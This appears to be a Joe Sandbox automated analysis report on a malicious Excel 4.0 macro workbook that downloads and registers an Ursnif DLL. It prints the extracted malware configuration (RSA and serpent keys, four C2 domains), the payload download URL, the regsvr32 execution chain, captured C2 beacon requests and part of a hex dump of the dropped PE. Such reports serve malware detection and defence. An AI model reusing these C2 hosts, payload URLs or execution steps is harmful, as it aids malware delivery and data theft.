Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 6613n246zm543w.xlsb

Overview

General Information

Sample Name:6613n246zm543w.xlsb
Analysis ID:403127
MD5:f5ac70a6e136e274a8856f244c9183b7
SHA1:3991a3a8ec56ee8487ff17e226c49f2355b9d3ac
SHA256:1f7a0472872d38133ce9fef933631d5110cf076ec44f344a95bd683e73fdbdc9
Tags:xlsb
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 7148 cmdline: regsvr32 -s C:\Users\Public\block.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 1260 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5696 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5828 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6384 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4996 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5368 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.regsvr32.exe.66db0000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              1.3.regsvr32.exe.41d8d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 1.2.regsvr32.exe.48494a0.2.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\Public\block.dllReversingLabs: Detection: 12%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllReversingLabs: Detection: 12%
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dllJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\block.dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: presentation[1].dll.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 17:48:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Mon, 03 May 2021 13:17:32 GMTAccept-Ranges: bytesContent-Length: 312832Cache-Control: max-age=10800Expires: Mon, 03 May 2021 20:48:15 GMThost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2Keep-Alive: timeout=5, max=75Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 98 d4 f0 e2 dc b5 9e b1 dc b5 9e b1 dc b5 9e b1 c2 e7 0b b1 cc b5 9e b1 c2 e7 1d b1 81 b5 9e b1 d5 cd 0d b1 d9 b5 9e b1 dc b5 9f b1 b4 b5 9e b1 c2 e7 1a b1 c3 b5 9e b1 c2 e7 0c b1 dd b5 9e b1 c2 e7 0a b1 dd b5 9e b1 c2 e7 0f b1 dd b5 9e b1 52 69 63 68 dc b5 9e b1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 df 48 6e 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 90 04 00 00 94 10 00 00 00 00 00 d2 3b 03 00 00 10 00 00 00 a0 04 00 00 00 00 01 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 15 00 00 04 00 00 aa f9 04 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 9f 04 00 54 00 00 00 9c 95 04 00 3c 00 00 00 00 20 15 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 15 00 d0 10 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 9e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 8f 04 00 00 10 00 00 00 90 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 71 10 00 00 a0 04 00 00 10 00 00 00 94 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 03 00 00 00 20 15 00 00 04 00 00 00 a4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 08 1d 00 00 00 30 15 00 00 1e 00 00 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: GET /presentation.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docs.atu.ngr.mybluehost.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
                Source: msapplication.xml0.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                Source: msapplication.xml0.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbb2191a6,0x01d74044</date><accdate>0xbb2191a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                Source: msapplication.xml5.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                Source: msapplication.xml5.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                Source: msapplication.xml7.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                Source: msapplication.xml7.18.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                Source: unknownDNS traffic detected: queries for: docs.atu.ngr.mybluehost.me
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 03 May 2021 17:49:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                Source: {E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.drString found in binary or memory: http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf
                Source: {0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.drString found in binary or memory: http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/
                Source: {FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat.24.dr, ~DFE7296AD5C85F4BE9.TMP.24.drString found in binary or memory: http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK
                Source: sharedStrings.binString found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dll
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                Source: msapplication.xml.18.drString found in binary or memory: http://www.amazon.com/
                Source: msapplication.xml1.18.drString found in binary or memory: http://www.google.com/
                Source: msapplication.xml2.18.drString found in binary or memory: http://www.live.com/
                Source: msapplication.xml3.18.drString found in binary or memory: http://www.nytimes.com/
                Source: msapplication.xml4.18.drString found in binary or memory: http://www.reddit.com/
                Source: msapplication.xml5.18.drString found in binary or memory: http://www.twitter.com/
                Source: msapplication.xml6.18.drString found in binary or memory: http://www.wikipedia.com/
                Source: msapplication.xml7.18.drString found in binary or memory: http://www.youtube.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.aadrm.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.office.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.onedrive.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://augloop.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://augloop.office.com/v2
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.entity.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://config.edge.skype.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cortana.ai/api
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://cr.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dev.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://devnull.onenote.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://directory.services.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.windows.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://graph.windows.net/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
